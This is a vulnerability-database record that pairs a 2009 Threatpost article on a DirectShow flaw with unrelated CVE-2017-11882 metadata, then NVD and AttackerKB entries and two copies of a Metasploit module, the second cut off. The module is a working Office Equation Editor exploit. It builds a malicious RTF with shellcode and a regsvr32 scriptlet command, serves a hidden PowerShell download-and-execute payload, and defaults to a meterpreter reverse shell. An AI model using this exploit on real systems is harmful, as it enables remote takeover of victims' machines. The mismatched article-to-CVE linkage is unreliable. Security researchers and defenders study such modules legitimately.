{"id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "description": "[](<https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/>)Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in Microsoft DirectShow. An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. This [KB article provides fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "published": "2009-05-28T21:16:23", "modified": "2013-04-17T16:39:08", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "reporter": "Ryan Naraine", "references": ["https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/", "http://www.microsoft.com/technet/security/advisory/971778.mspx", "http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx", "http://support.microsoft.com/kb/971778", "http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx"], "cvelist": ["CVE-2017-11882"], "lastseen": "2018-10-06T23:10:02", "viewCount": 7, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2018-10-06T23:10:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-11882"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/"]}, {"type": "symantec", "idList": ["SMNTC-101757"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892510", "MYHACK58:62201892253"]}, {"type": "threatpost", "idList": ["THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:3283173A16F1E86892491D89F2E307C2"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047"]}, {"type": "securelist", "idList": ["SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "thn", "idList": ["THN:81AA37DC2B87520CB02F3508EF82AABD"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812148"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:F099654AA95F6498DB33414802DBA792"]}], "modified": "2018-10-06T23:10:02", "rev": 2}, "vulnersScore": 5.2}}

{"cve": [{"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11884.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11882", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-01-26T18:15:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2016"], "id": "CVE-2017-11882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-01-26T21:28:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2017-11-15T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "type": "attackerkb", "title": "CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T09:46:17", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}, {"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n 